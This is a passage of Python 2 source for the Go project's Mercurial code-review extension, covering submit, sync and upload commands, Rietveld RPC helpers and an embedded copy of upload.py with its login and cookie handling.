"(^https?://([^@/]+@)?code\.google\.com/p/([^/.]+)(\.[^./]+)?/?)", url)
if m:
if m.group(1): # prj.googlecode.com/hg/ case
changeURL = "https://code.google.com/p/%s/source/detail?r=%s" % (m.group(3), changeURL)
elif m.group(4) and m.group(7): # code.google.com/p/prj.subrepo/ case
changeURL = "https://code.google.com/p/%s/source/detail?r=%s&repo=%s" % (m.group(6), changeURL, m.group(7)[1:])
elif m.group(4): # code.google.com/p/prj/ case
changeURL = "https://code.google.com/p/%s/source/detail?r=%s" % (m.group(6), changeURL)
else:
print >>sys.stderr, "URL: ", url
else:
print >>sys.stderr, "URL: ", url
pmsg = "*** Submitted as " + changeURL + " ***\n\n" + message
# When posting, move reviewers to CC line,
# so that the issue stops showing up in their "My Issues" page.
PostMessage(ui, cl.name, pmsg, reviewers="", cc=JoinComma(cl.reviewer+cl.cc))
if not cl.copied_from:
EditDesc(cl.name, closed=True, private=cl.private)
cl.Delete(ui, repo)
c = repo[None]
if c.branch() == releaseBranch and not c.modified() and not c.added() and not c.removed():
ui.write("switching from %s to default branch.\n" % releaseBranch)
err = hg_clean(repo, "default")
if err:
return err
return 0
#######################################################################
# hg sync
@hgcommand
def sync(ui, repo, **opts):
"""synchronize with remote repository
Incorporates recent changes from the remote repository
into the local repository.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
if not opts["local"]:
err = hg_pull(ui, repo, update=True)
if err:
return err
sync_changes(ui, repo)
def sync_changes(ui, repo):
# Look through recent change log descriptions to find
# potential references to http://.*/our-CL-number.
# Double-check them by looking at the Rietveld log.
for rev in hg_log(ui, repo, limit=100, template="{node}\n").split():
desc = repo[rev].description().strip()
for clname in re.findall('(?m)^https?://(?:[^\n]+)/([0-9]+)$', desc):
if IsLocalCL(ui, repo, clname) and IsRietveldSubmitted(ui, clname, repo[rev].hex()):
ui.warn("CL %s submitted as %s; closing\n" % (clname, repo[rev]))
cl, err = LoadCL(ui, repo, clname, web=False)
if err != "":
ui.warn("loading CL %s: %s\n" % (clname, err))
continue
if not cl.copied_from:
EditDesc(cl.name, closed=True, private=cl.private)
cl.Delete(ui, repo)
# Remove files that are not modified from the CLs in which they appear.
all = LoadAllCL(ui, repo, web=False)
changed = ChangedFiles(ui, repo, [])
for cl in all.values():
extra = Sub(cl.files, changed)
if extra:
ui.warn("Removing unmodified files from CL %s:\n" % (cl.name,))
for f in extra:
ui.warn("\t%s\n" % (f,))
cl.files = Sub(cl.files, extra)
cl.Flush(ui, repo)
if not cl.files:
if not cl.copied_from:
ui.warn("CL %s has no files; delete (abandon) with hg change -d %s\n" % (cl.name, cl.name))
else:
ui.warn("CL %s has no files; delete locally with hg change -D %s\n" % (cl.name, cl.name))
return 0
#######################################################################
# hg upload
@hgcommand
def upload(ui, repo, name, **opts):
"""upload diffs to the code review server
Uploads the current modifications for a given change to the server.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
repo.ui.quiet = True
cl, err = LoadCL(ui, repo, name, web=True)
if err != "":
raise hg_util.Abort(err)
if not cl.local:
raise hg_util.Abort("cannot upload non-local change")
cl.Upload(ui, repo)
print "%s%s\n" % (server_url_base, cl.name)
return 0
#######################################################################
# Table of commands, supplied to Mercurial for installation.
review_opts = [
('r', 'reviewer', '', 'add reviewer'),
('', 'cc', '', 'add cc'),
('', 'tbr', '', 'add future reviewer'),
('m', 'message', '', 'change description (for new change)'),
]
cmdtable = {
# The ^ means to show this command in the help text that
# is printed when running hg with no arguments.
"^change": (
change,
[
('d', 'delete', None, 'delete existing change list'),
('D', 'deletelocal', None, 'delete locally, but do not change CL on server'),
('i', 'stdin', None, 'read change list from standard input'),
('o', 'stdout', None, 'print change list to standard output'),
('p', 'pending', None, 'print pending summary to standard output'),
],
"[-d | -D] [-i] [-o] change# or FILE ..."
),
"^clpatch": (
clpatch,
[
('', 'ignore_hgapplydiff_failure', None, 'create CL metadata even if hgapplydiff fails'),
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
# Would prefer to call this codereview-login, but then
# hg help codereview prints the help for this command
# instead of the help for the extension.
"code-login": (
code_login,
[],
"",
),
"^download": (
download,
[],
"change#"
),
"^file": (
file,
[
('d', 'delete', None, 'delete files from change list (but not repository)'),
],
"[-d] change# FILE ..."
),
"^gofmt": (
gofmt,
[
('l', 'list', None, 'list files that would change, but do not edit them'),
],
"FILE ..."
),
"^pending|p": (
pending,
[
('s', 'short', False, 'show short result form'),
('', 'quick', False, 'do not consult codereview server'),
],
"[FILE ...]"
),
"^ps": (
ps,
[],
"[FILE ...]"
),
"^pq": (
pq,
[],
"[FILE ...]"
),
"^mail": (
mail,
review_opts + [
] + hg_commands.walkopts,
"[-r reviewer] [--cc cc] [change# | file ...]"
),
"^release-apply": (
release_apply,
[
('', 'ignore_hgapplydiff_failure', None, 'create CL metadata even if hgapplydiff fails'),
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
# TODO: release-start, release-tag, weekly-tag
"^submit": (
submit,
review_opts + [
('', 'no_incoming', None, 'disable initial incoming check (for testing)'),
] + hg_commands.walkopts + hg_commands.commitopts + hg_commands.commitopts2,
"[-r reviewer] [--cc cc] [change# | file ...]"
),
"^sync": (
sync,
[
('', 'local', None, 'do not pull changes from remote repository')
],
"[--local]",
),
"^undo": (
undo,
[
('', 'ignore_hgapplydiff_failure', None, 'create CL metadata even if hgapplydiff fails'),
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
"^upload": (
upload,
[],
"change#"
),
}
#######################################################################
# Mercurial extension initialization
def norollback(*pats, **opts):
"""(disabled when using this extension)"""
raise hg_util.Abort("codereview extension enabled; use undo instead of rollback")
codereview_init = False
def reposetup(ui, repo):
global codereview_disabled
global defaultcc
# reposetup gets called both for the local repository
# and also for any repository we are pulling or pushing to.
# Only initialize the first time.
global codereview_init
if codereview_init:
return
codereview_init = True
start_status_thread()
# Read repository-specific options from lib/codereview/codereview.cfg or codereview.cfg.
root = ''
try:
root = repo.root
except:
# Yes, repo might not have root; see issue 959.
codereview_disabled = 'codereview disabled: repository has no root'
return
repo_config_path = ''
p1 = root + '/lib/codereview/codereview.cfg'
p2 = root + '/codereview.cfg'
if os.access(p1, os.F_OK):
repo_config_path = p1
else:
repo_config_path = p2
try:
f = open(repo_config_path)
for line in f:
if line.startswith('defaultcc:'):
defaultcc = SplitCommaSpace(line[len('defaultcc:'):])
if line.startswith('contributors:'):
global contributorsURL
contributorsURL = line[len('contributors:'):].strip()
except:
codereview_disabled = 'codereview disabled: cannot open ' + repo_config_path
return
remote = ui.config("paths", "default", "")
if remote.find("://") < 0:
raise hg_util.Abort("codereview: default path '%s' is not a URL" % (remote,))
InstallMatch(ui, repo)
RietveldSetup(ui, repo)
# Disable the Mercurial commands that might change the repository.
# Only commands in this extension are supposed to do that.
ui.setconfig("hooks", "precommit.codereview", precommithook)
# Rollback removes an existing commit. Don't do that either.
global real_rollback
real_rollback = repo.rollback
repo.rollback = norollback
#######################################################################
# Wrappers around upload.py for interacting with Rietveld
from HTMLParser import HTMLParser
# HTML form parser
class FormParser(HTMLParser):
def __init__(self):
self.map = {}
self.curtag = None
self.curdata = None
HTMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
if tag == "input":
key = None
value = ''
for a in attrs:
if a[0] == 'name':
key = a[1]
if a[0] == 'value':
value = a[1]
if key is not None:
self.map[key] = value
if tag == "textarea":
key = None
for a in attrs:
if a[0] == 'name':
key = a[1]
if key is not None:
self.curtag = key
self.curdata = ''
def handle_endtag(self, tag):
if tag == "textarea" and self.curtag is not None:
self.map[self.curtag] = self.curdata
self.curtag = None
self.curdata = None
def handle_charref(self, name):
self.handle_data(unichr(int(name)))
def handle_entityref(self, name):
import htmlentitydefs
if name in htmlentitydefs.entitydefs:
self.handle_data(htmlentitydefs.entitydefs[name])
else:
self.handle_data("&" + name + ";")
def handle_data(self, data):
if self.curdata is not None:
self.curdata += data
def JSONGet(ui, path):
try:
data = MySend(path, force_auth=False)
typecheck(data, str)
d = fix_json(json.loads(data))
except:
ui.warn("JSONGet %s: %s\n" % (path, ExceptionDetail()))
return None
return d
# Clean up json parser output to match our expectations:
# * all strings are UTF-8-encoded str, not unicode.
# * missing fields are missing, not None,
# so that d.get("foo", defaultvalue) works.
def fix_json(x):
if type(x) in [str, int, float, bool, type(None)]:
pass
elif type(x) is unicode:
x = x.encode("utf-8")
elif type(x) is list:
for i in range(len(x)):
x[i] = fix_json(x[i])
elif type(x) is dict:
todel = []
for k in x:
if x[k] is None:
todel.append(k)
else:
x[k] = fix_json(x[k])
for k in todel:
del x[k]
else:
raise hg_util.Abort("unknown type " + str(type(x)) + " in fix_json")
if type(x) is str:
x = x.replace('\r\n', '\n')
return x
def IsRietveldSubmitted(ui, clname, hex):
dict = JSONGet(ui, "/api/" + clname + "?messages=true")
if dict is None:
return False
for msg in dict.get("messages", []):
text = msg.get("text", "")
m = re.match('\*\*\* Submitted as [^*]*?([0-9a-f]+) \*\*\*', text)
if m is not None and len(m.group(1)) >= 8 and hex.startswith(m.group(1)):
return True
return False
def IsRietveldMailed(cl):
for msg in cl.dict.get("messages", []):
if msg.get("text", "").find("I'd like you to review this change") >= 0:
return True
return False
def DownloadCL(ui, repo, clname):
set_status("downloading CL " + clname)
cl, err = LoadCL(ui, repo, clname, web=True)
if err != "":
return None, None, None, "error loading CL %s: %s" % (clname, err)
# Find most recent diff
diffs = cl.dict.get("patchsets", [])
if not diffs:
return None, None, None, "CL has no patch sets"
patchid = diffs[-1]
patchset = JSONGet(ui, "/api/" + clname + "/" + str(patchid))
if patchset is None:
return None, None, None, "error loading CL patchset %s/%d" % (clname, patchid)
if patchset.get("patchset", 0) != patchid:
return None, None, None, "malformed patchset information"
vers = ""
msg = patchset.get("message", "").split()
if len(msg) >= 3 and msg[0] == "diff" and msg[1] == "-r":
vers = msg[2]
diff = "/download/issue" + clname + "_" + str(patchid) + ".diff"
diffdata = MySend(diff, force_auth=False)
# Print warning if email is not in CONTRIBUTORS file.
email = cl.dict.get("owner_email", "")
if not email:
return None, None, None, "cannot find owner for %s" % (clname)
him = FindContributor(ui, repo, email)
me = FindContributor(ui, repo, None)
if him == me:
cl.mailed = IsRietveldMailed(cl)
else:
cl.copied_from = email
return cl, vers, diffdata, ""
def MySend(request_path, payload=None,
content_type="application/octet-stream",
timeout=None, force_auth=True,
**kwargs):
"""Run MySend1 maybe twice, because Rietveld is unreliable."""
try:
return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
except Exception, e:
if type(e) != urllib2.HTTPError or e.code != 500: # only retry on HTTP 500 error
raise
print >>sys.stderr, "Loading "+request_path+": "+ExceptionDetail()+"; trying again in 2 seconds."
time.sleep(2)
return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
# Like upload.py Send but only authenticates when the
# redirect is to www.google.com/accounts. This keeps
# unnecessary redirects from happening during testing.
def MySend1(request_path, payload=None,
content_type="application/octet-stream",
timeout=None, force_auth=True,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
global rpc
if rpc == None:
rpc = GetRpcServer(upload_options)
self = rpc
if not self.authenticated and force_auth:
self._Authenticate()
if request_path is None:
return
if timeout is None:
timeout = 30 # seconds
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "https://%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
try:
f = self.opener.open(req)
response = f.read()
f.close()
# Translate \r\n into \n, because Rietveld doesn't.
response = response.replace('\r\n', '\n')
# who knows what urllib will give us
if type(response) == unicode:
response = response.encode("utf-8")
typecheck(response, str)
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401:
self._Authenticate()
elif e.code == 302:
loc = e.info()["location"]
if not loc.startswith('https://www.google.com/a') or loc.find('/ServiceLogin') < 0:
return ''
self._Authenticate()
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
def GetForm(url):
f = FormParser()
f.feed(ustr(MySend(url))) # f.feed wants unicode
f.close()
# convert back to utf-8 to restore sanity
m = {}
for k,v in f.map.items():
m[k.encode("utf-8")] = v.replace("\r\n", "\n").encode("utf-8")
return m
def EditDesc(issue, subject=None, desc=None, reviewers=None, cc=None, closed=False, private=False):
set_status("uploading change to description")
form_fields = GetForm("/" + issue + "/edit")
if subject is not None:
form_fields['subject'] = subject
if desc is not None:
form_fields['description'] = desc
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if closed:
form_fields['closed'] = "checked"
if private:
form_fields['private'] = "checked"
ctype, body = EncodeMultipartFormData(form_fields.items(), [])
response = MySend("/" + issue + "/edit", body, content_type=ctype)
if response != "":
print >>sys.stderr, "Error editing description:\n" + "Sent form: \n", form_fields, "\n", response
sys.exit(2)
def PostMessage(ui, issue, message, reviewers=None, cc=None, send_mail=True, subject=None):
set_status("uploading message")
form_fields = GetForm("/" + issue + "/publish")
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if send_mail:
form_fields['send_mail'] = "checked"
else:
del form_fields['send_mail']
if subject is not None:
form_fields['subject'] = subject
form_fields['message'] = message
form_fields['message_only'] = '1' # Don't include draft comments
if reviewers is not None or cc is not None:
form_fields['message_only'] = '' # Must set '' in order to override cc/reviewer
ctype = "applications/x-www-form-urlencoded"
body = urllib.urlencode(form_fields)
response = MySend("/" + issue + "/publish", body, content_type=ctype)
if response != "":
print response
sys.exit(2)
class opt(object):
pass
def RietveldSetup(ui, repo):
global force_google_account
global rpc
global server
global server_url_base
global upload_options
global verbosity
if not ui.verbose:
verbosity = 0
# Config options.
x = ui.config("codereview", "server")
if x is not None:
server = x
# TODO(rsc): Take from ui.username?
email = None
x = ui.config("codereview", "email")
if x is not None:
email = x
server_url_base = "https://" + server + "/"
testing = ui.config("codereview", "testing")
force_google_account = ui.configbool("codereview", "force_google_account", False)
upload_options = opt()
upload_options.email = email
upload_options.host = None
upload_options.verbose = 0
upload_options.description = None
upload_options.description_file = None
upload_options.reviewers = None
upload_options.cc = None
upload_options.message = None
upload_options.issue = None
upload_options.download_base = False
upload_options.revision = None
upload_options.send_mail = False
upload_options.vcs = None
upload_options.server = server
upload_options.save_cookies = True
if testing:
upload_options.save_cookies = False
upload_options.email = "test@example.com"
rpc = None
global releaseBranch
tags = repo.branchtags().keys()
if 'release-branch.go10' in tags:
# NOTE(rsc): This tags.sort is going to get the wrong
# answer when comparing release-branch.go9 with
# release-branch.go10. It will be a while before we care.
raise hg_util.Abort('tags.sort needs to be fixed for release-branch.go10')
tags.sort()
for t in tags:
if t.startswith('release-branch.go'):
releaseBranch = t
#######################################################################
# http://codereview.appspot.com/static/upload.py, heavily edited.
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for uploading diffs from a version control system to the codereview app.
Usage summary: upload.py [options] [-- diff_options]
Diff options are passed to the diff command of the underlying system.
Supported version control systems:
Git
Mercurial
Subversion
It is important for Git/Mercurial users to specify a tree/node/branch to diff
against by using the '--rev' option.
"""
# This code is derived from appcfg.py in the App Engine SDK (open source),
# and from ASPN recipe #146306.
import cookielib
import getpass
import logging
import mimetypes
import optparse
import os
import re
import socket
import subprocess
import sys
import urllib
import urllib2
import urlparse
# The md5 module was deprecated in Python 2.5.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
import readline
except ImportError:
pass
# The logging verbosity:
# 0: Errors only.
# 1: Status messages.
# 2: Info logs.
# 3: Debug logs.
verbosity = 1
# Max size of patch or base file.
MAX_UPLOAD_SIZE = 900 * 1024
# whitelist for non-binary filetypes which do not start with "text/"
# .mm (Objective-C) shows up as application/x-freemind on my Linux box.
TEXT_MIMETYPES = [
'application/javascript',
'application/x-javascript',
'application/x-freemind'
]
def GetEmail(prompt):
"""Prompts the user for their email address and returns it.
The last used email address is saved to a file and offered up as a suggestion
to the user. If the user presses enter without typing in anything the last
used email address is used. If the user enters a new address, it is saved
for next time we prompt.
"""
last_email_file_name = os.path.expanduser("~/.last_codereview_email_address")
last_email = ""
if os.path.exists(last_email_file_name):
try:
last_email_file = open(last_email_file_name, "r")
last_email = last_email_file.readline().strip("\n")
last_email_file.close()
prompt += " [%s]" % last_email
except IOError, e:
pass
email = raw_input(prompt + ": ").strip()
if email:
try:
last_email_file = open(last_email_file_name, "w")
last_email_file.write(email)
last_email_file.close()
except IOError, e:
pass
else:
email = last_email
return email
def StatusUpdate(msg):
"""Print a status message to stdout.
If 'verbosity' is greater than 0, print the message.
Args:
msg: The string to print.
"""
if verbosity > 0:
print msg
def ErrorExit(msg):
"""Print an error message to stderr and exit."""
print >>sys.stderr, msg
sys.exit(1)
class ClientLoginError(urllib2.HTTPError):
"""Raised to indicate there was an error authenticating with ClientLogin."""
def __init__(self, url, code, msg, headers, args):
urllib2.HTTPError.__init__(self, url, code, msg, headers, None)
self.args = args
# .reason is now a read-only property based on .msg
# this means we ignore 'msg', but that seems to work fine.
self.msg = args["Error"]
class AbstractRpcServer(object):
"""Provides a common interface for a simple RPC server."""
def __init__(self, host, auth_function, host_override=None, extra_headers={}, save_cookies=False):
"""Creates a new HttpRpcServer.
Args:
host: The host to send requests to.
auth_function: A function that takes no arguments and returns an
(email, password) tuple when called. Will be called if authentication
is required.
host_override: The host header to send to the server (defaults to host).
extra_headers: A dict of extra headers to append to every request.
save_cookies: If True, save the authentication cookies to local disk.
If False, use an in-memory cookiejar instead. Subclasses must
implement this functionality. Defaults to False.
"""
self.host = host
self.host_override = host_override
self.auth_function = auth_function
self.authenticated = False
self.extra_headers = extra_headers
self.save_cookies = save_cookies
self.opener = self._GetOpener()
if self.host_override:
logging.info("Server: %s; Host: %s", self.host, self.host_override)
else:
logging.info("Server: %s", self.host)
def _GetOpener(self):
"""Returns an OpenerDirector for making HTTP requests.
Returns:
A urllib2.OpenerDirector object.
"""
raise NotImplementedError()
def _CreateRequest(self, url, data=None):
"""Creates a new urllib request."""
logging.debug("Creating request for: '%s' with payload:\n%s", url, data)
req = urllib2.Request(url, data=data)
if self.host_override:
req.add_header("Host", self.host_override)
for key, value in self.extra_headers.iteritems():
req.add_header(key, value)
return req
def _GetAuthToken(self, email, password):
"""Uses ClientLogin to authenticate the user, returning an auth token.
Args:
email: The user's email address
password: The user's password
Raises:
ClientLoginError: If there was an error authenticating with ClientLogin.
HTTPError: If there was some other form of HTTP error.
Returns:
The authentication token returned by ClientLogin.
"""
account_type = "GOOGLE"
if self.host.endswith(".google.com") and not force_google_account:
# Needed for use inside Google.
account_type = "HOSTED"
req = self._CreateRequest(
url="https://www.google.com/accounts/ClientLogin",
data=urllib.urlencode({
"Email": email,
"Passwd": password,
"service": "ah",
"source": "rietveld-codereview-upload",
"accountType": account_type,
}),
)
try:
response = self.opener.open(req)
response_body = response.read()
response_dict = dict(x.split("=") for x in response_body.split("\n") if x)
return response_dict["Auth"]
except urllib2.HTTPError, e:
if e.code == 403:
body = e.read()
response_dict = dict(x.split("=", 1) for x in body.split("\n") if x)
raise ClientLoginError(req.get_full_url(), e.code, e.msg, e.headers, response_dict)
else:
raise
def _GetAuthCookie(self, auth_token):
"""Fetches authentication cookies for an authentication token.
Args:
auth_token: The authentication token returned by ClientLogin.
Raises:
HTTPError: If there was an error fetching the authentication cookies.
"""
# This is a dummy value to allow us to identify when we're successful.
continue_location = "http://localhost/"
args = {"continue": continue_location, "auth": auth_token}
req = self._CreateRequest("https://%s/_ah/login?%s" % (self.host, urllib.urlencode(args)))
try:
response = self.opener.open(req)
except urllib2.HTTPError, e:
response = e
if (response.code != 302 or
response.info()["location"] != continue_location):
raise urllib2.HTTPError(req.get_full_url(), response.code, response.msg, response.headers, response.fp)
self.authenticated = True
def _Authenticate(self):
"""Authenticates the user.
The authentication process works as follows:
1) We get a username and password from the user
2) We use ClientLogin to obtain an AUTH token for the user
(see http://code.google.com/apis/accounts/AuthForInstalledApps.html).
3) We pass the auth token to /_ah/login on the server to obtain an
authentication cookie. If login was successful, it tries to redirect
us to the URL we provided.
If we attempt to access the upload API without first obtaining an
authentication cookie, it returns a 401 response (or a 302) and
directs us to authenticate ourselves with ClientLogin.
"""
for i in range(3):
credentials = self.auth_function()
try:
auth_token = self._GetAuthToken(credentials[0], credentials[1])
except ClientLoginError, e:
if e.msg == "BadAuthentication":
print >>sys.stderr, "Invalid username or password."
continue
if e.msg == "CaptchaRequired":
print >>sys.stderr, (
"Please go to\n"
"https://www.google.com/accounts/DisplayUnlockCaptcha\n"
"and verify you are a human. Then try again.")
break
if e.msg == "NotVerified":
print >>sys.stderr, "Account not verified."
break
if e.msg == "TermsNotAgreed":
print >>sys.stderr, "User has not agreed to TOS."
break
if e.msg == "AccountDeleted":
print >>sys.stderr, "The user account has been deleted."
break
if e.msg == "AccountDisabled":
print >>sys.stderr, "The user account has been disabled."
break
if e.msg == "ServiceDisabled":
print >>sys.stderr, "The user's access to the service has been disabled."
break
if e.msg == "ServiceUnavailable":
print >>sys.stderr, "The service is not available; try again later."
break
raise
self._GetAuthCookie(auth_token)
return
def Send(self, request_path, payload=None,
content_type="application/octet-stream",
timeout=None,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
if not self.authenticated:
self._Authenticate()
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "https://%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
try:
f = self.opener.open(req)
response = f.read()
f.close()
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401 or e.code == 302:
self._Authenticate()
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
class HttpRpcServer(AbstractRpcServer):
"""Provides a simplified RPC-style interface for HTTP requests."""
def _Authenticate(self):
"""Save the cookie jar after authentication."""
super(HttpRpcServer, self)._Authenticate()
if self.save_cookies:
StatusUpdate("Saving authentication cookies to %s" % self.cookie_file)
self.cookie_jar.save()
def _GetOpener(self):
"""Returns an OpenerDirector that supports cookies and ignores redirects.
Returns:
A urllib2.OpenerDirector object.
"""
opener = urllib2.OpenerDirector()
opener.add_handler(urllib2.ProxyHandler())
opener.add_handler(urllib2.UnknownHandler())
opener.add_handler(urllib2.HTTPHandler())
opener.add_handler(urllib2.HTTPDefaultErrorHandler())
opener.add_handler(urllib2.HTTPSHandler())
opener.add_handler(urllib2.HTTPErrorProcessor())
if self.save_cookies:
self.cookie_file = os.path.expanduser("~/.codereview_upload_cookies_" + server)
self.cookie_jar = cookielib.MozillaCookieJar(self.cookie_file)
if os.path.exists(self.cookie_file):
try:
self.cookie_jar.load()
self.authenticated = True
StatusUpdate("Loaded authentication cookies from %s" % self.cookie_file)
except (cookielib.LoadError, IOError):
# Failed to load cookies - just ignore them.
pass
else:
# Create an empty cookie file with mode 600
fd = os.open(self.cookie_file, os.O_CREAT, 0600)
os.close(fd)
# Always chmod the cookie file
os.chmod(self.cookie_file, 0600)
else:
# Don't save cookies across runs of update.py.
self.cookie_jar = cookielib.CookieJar()
opener.add_handler(urllib2.HTTPCookieProcessor(self.cookie_jar))
return opener
def GetRpcServer(options):
"""Returns an instance of an AbstractRpcServer.
Returns:
A new AbstractRpcServer, on which RPC calls can be made.
"""
rpc_server_class = HttpRpcServer
def GetUserCredentials():
"""Prompts the user for a username and password."""
# Disable status prints so they don't obscure the password prompt.
global global_status
st = global_status
global_status = None
email = options.email
if email is None:
email = GetEmail("Email (login for uploading to %s)" % options.server)
password = getpass.getpass("Password for %s: " % email)
# Put status back.
global_status = st
return (email, password)
# If this is the dev_appserver, use fake authentication.
host = (options.host or options.server).lower()
if host == "localhost" or host.startswith("localhost:"):
email = options.email
if email is None:
email = "test@example.com"
logging.info("Using debug user %s. Override with --email" % email)
server = rpc_server_class(
options.server,
lambda: (email, "password"),
host_override=options.host,
extra_headers={"Cookie": 'dev_appserver_login="%s:False"' % email},
save_cookies=options.save_cookies)
# Don't try to talk to ClientLogin.
server.authenticated = True
return server
return rpc_server_class(options.server, GetUserCredentials,
host_override=options.host, save_cookies=options.save_cookies)
def EncodeMultipartFormData(fields, files):
"""Encode form fields for multipart/form-data.
Args:
fields: A sequence of (name, value) elements for regular form fields.
files: A sequence of (name, filename, value) elements for data to be
uploaded as files.
Returns:
(content_type, body) ready for httplib.HTTP instance.
Source:
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
"""
BOUNDARY = '-M-A-G-I-C---B-O-U-N-D-A-R-Y-'
CRLF = '\r\n'
lines = []
for (key, value) in fields:
typecheck(key, str)
typecheck(value, str)
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"' % key)
lines.append('')
lines.append(value)
for (key, filename, value) in files:
typecheck(key, str)
typecheck(filename, str)
typecheck(value, str)
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
lines.append('Content-Type: %s' % GetContentType(filename))
lines.append('')
lines.append(value)
lines.append('--' + BOUNDARY + '--')
lines.append('')
body = CRLF.join(lines)
content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
return content_type, body
def GetContentType(filename):
"""Helper to guess the content-type from the filename."""
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
# Use a shell for subcommands on Windows to get a PATH search.
use_shell = sys.platform.startswith("win")
def RunShellWithReturnCode(command, print_output=False,
universal_newlines=True, env=os.environ):
"""Executes a command and returns the output from stdout and the return code.
Args:
command: Command to execute.
print_output: If True, the output is printed to stdout.
If False, both stdout and stderr are ignored.
universal_newlines: Use universal_newlines flag (default: True).
Returns:
Tuple (output, return code)
"""
logging.info("Running %s", command)
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=use_shell, universal_newlines=universal_newlines, env=env)
if print_output:
output_array = []
while True:
line = p.stdout.readline()
if not line:
break
print line.strip("\n")
output_array.append(line)
output = "".join(output_array)
else:
output = p.stdout.read()
p.wait()
errout = p.stderr.read()
if print_output and errout:
print >>sys.stderr, errout
p.stdout.close()
p.stderr.close()
return output, p.returncode
def RunShell(command, silent_ok=False, universal_newlines=True,
print_output=False, env=os.environ):
data, retcode = RunShellWithReturnCode(command, print_output, universal_newlines, env)
if retcode:
ErrorExit("Got error status from %s:\n%s" % (command, data))
if not silent_ok and not data:
ErrorExit("No output from %s" % command)
return data
class VersionControlSystem(object):
"""Abstract base class providing an interface to the VCS."""
def __init__(self, options):
"""Constructor.
Args:
options: Command line options.
"""
self.options = options
def GenerateDiff(self, args):
"""Return the current diff as a string.
Args:
args: Extra arguments to pass to the diff command.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def CheckForUnknownFiles(self):
"""Show an "are you sure?" prompt if there are unknown files."""
unknown_files = self.GetUnknownFiles()
if unknown_files:
print "The following files are not added to version control:"
for line in unknown_files:
print line
prompt = "Are you sure to continue?(y/N) "
answer = raw_input(prompt).strip()
if answer != "y":
ErrorExit("User aborted")
def GetBaseFile(self, filename):
"""Get the content of the upstream version of a file.
Returns:
A tuple (base_content, new_content, is_binary, status)
base_content: The contents of the base file.
new_content: For text files, this is empty. For binary files, this is
the contents of the new file, since the diff output won't contain
information to reconstruct the current file.
is_binary: True iff the file is binary.
status: The status of the file.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetBaseFiles(self, diff):
"""Helper that calls GetBase file for each file in the patch.
Returns:
A dictionary that maps from filename to GetBaseFile's tuple. Filenames
are retrieved based on lines that start with "Index:" or
"Property changes on:".
"""
files = {}
for line in diff.splitlines(True):
if line.startswith('Index:') or line.startswith('Property changes on:'):
unused, filename = line.split(':', 1)
# On Windows if a file has property changes its filename uses '\'
# instead of '/'.
filename = to_slash(filename.strip())
files[filename] = self.GetBaseFile(filename)
return files
def UploadBaseFiles(self, issue, rpc_server, patch_list, patchset, options,
files):
"""Uploads the base files (and if necessary, the current ones as well)."""
def UploadFile(filename, file_id, content, is_binary, status, is_base):
"""Uploads a file to the server."""
set_status("uploading " + filename)
file_too_large = False
if is_base:
type = "base"
else:
type = "current"
if len(content) > MAX_UPLOAD_SIZE:
print ("Not uploading the %s file for %s because it's too large." %
(type, filename))
file_too_large = True
content = ""
checksum = md5(content).hexdigest()
if options.verbose > 0 and not file_too_large:
print "Uploading %s file for %s" % (type, filename)
